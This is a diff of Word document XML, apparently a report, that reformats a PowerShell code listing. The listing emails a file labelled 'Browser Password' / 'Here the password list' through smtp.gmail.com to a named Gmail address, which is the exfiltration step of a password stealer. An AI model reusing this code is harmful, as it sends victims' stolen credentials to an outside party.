@@ -36697,25 +33788,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">    $</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>smtp.Credentials</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve"> = New-Object System.Net.NetworkCredential($Username, $Password);</w:t>
+                              <w:t xml:space="preserve">    $message.To.Add($email);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -36732,25 +33805,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">    $</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>smtp.send</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>($message);</w:t>
+                              <w:t xml:space="preserve">    $message.Subject = "Browser Password";</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -36767,25 +33822,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">    write-host "Mail Sent</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>" ;</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve"> </w:t>
+                              <w:t xml:space="preserve">    $message.Body = "Here the password list";</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -36802,25 +33839,135 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">    $</w:t>
+                              <w:t xml:space="preserve">    $attachment = New-Object Net.Mail.Attachment($attachmentpath);</w:t>
                             </w:r>
-                            <w:proofErr w:type="gramStart"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                            </w:pPr>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>attachment.Dispose</w:t>
+                              <w:t xml:space="preserve">    $message.Attachments.Add($attachment);</w:t>
                             </w:r>
-                            <w:proofErr w:type="gramEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                            </w:pPr>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>();</w:t>
+                              <w:t xml:space="preserve">    $smtp = new-object Net.Mail.SmtpClient("smtp.gmail.com", "587");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">    $smtp.EnableSSL = $TRUE;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">    $smtp.Credentials = New-Object System.Net.NetworkCredential($Username, $Password);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">    $smtp.send($message);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">    write-host "Mail Sent" ; </w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">    $attachment.Dispose();</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -36854,25 +34001,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>Send-</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>ToEmail  -</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>email "abdulazies55@gmail.com" -attachmentpath $path;</w:t>
+                              <w:t>Send-ToEmail  -email "abdulazies55@gmail.com" -attachmentpath $path;</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -36977,271 +34106,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>function Send-ToEmail([string]$email, [string]$</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>attachmentpath){</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                      </w:pPr>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">    $message = new-object </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>Net.Mail.MailMessage</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>;</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">    $</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>message.From</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve"> = $Username;</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">    $message.</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>To.Add</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>($email);</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">    $</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>message.Subject</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve"> = "Browser Password";</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">    $</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>message.Body</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve"> = "Here the password list";</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">    $attachment = New-Object </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>Net.Mail.Attachment</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>($attachmentpath);</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">    $</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>message.Attachments.Add</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>($attachment);</w:t>
+                        <w:t>function Send-ToEmail([string]$email, [string]$attachmentpath){</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -37267,25 +34132,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">    $smtp = new-object </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>Net.Mail.SmtpClient</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>("smtp.gmail.com", "587");</w:t>
+                        <w:t xml:space="preserve">    $message = new-object Net.Mail.MailMessage;</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -37302,25 +34149,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">    $</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>smtp.EnableSSL</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve"> = $TRUE;</w:t>
+                        <w:t xml:space="preserve">    $message.From = $Username;</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -37337,25 +34166,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">    $</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>smtp.Credentials</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve"> = New-Object System.Net.NetworkCredential($Username, $Password);</w:t>
+                        <w:t xml:space="preserve">    $message.To.Add($email);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -37372,25 +34183,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">    $</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>smtp.send</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>($message);</w:t>
+                        <w:t xml:space="preserve">    $message.Subject = "Browser Password";</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -37407,25 +34200,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">    write-host "Mail Sent</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>" ;</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve"> </w:t>
+                        <w:t xml:space="preserve">    $message.Body = "Here the password list";</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -37442,25 +34217,135 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">    $</w:t>
+                        <w:t xml:space="preserve">    $attachment = New-Object Net.Mail.Attachment($attachmentpath);</w:t>
                       </w:r>
-                      <w:proofErr w:type="gramStart"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                      </w:pPr>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>attachment.Dispose</w:t>
+                        <w:t xml:space="preserve">    $message.Attachments.Add($attachment);</w:t>
                       </w:r>
-                      <w:proofErr w:type="gramEnd"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                      </w:pPr>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>();</w:t>
+                        <w:t xml:space="preserve">    $smtp = new-object Net.Mail.SmtpClient("smtp.gmail.com", "587");</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">    $smtp.EnableSSL = $TRUE;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">    $smtp.Credentials = New-Object System.Net.NetworkCredential($Username, $Password);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">    $smtp.send($message);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">    write-host "Mail Sent" ; </w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">    $attachment.Dispose();</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -37494,25 +34379,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>Send-</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>ToEmail  -</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>email "abdulazies55@gmail.com" -attachmentpath $path;</w:t>
+                        <w:t>Send-ToEmail  -email "abdulazies55@gmail.com" -attachmentpath $path;</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -37537,9 +34404,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="118" w:name="_Toc43087618"/>
-      <w:bookmarkStart w:id="119" w:name="_Toc43087912"/>
-      <w:bookmarkStart w:id="120" w:name="_Toc43258889"/>
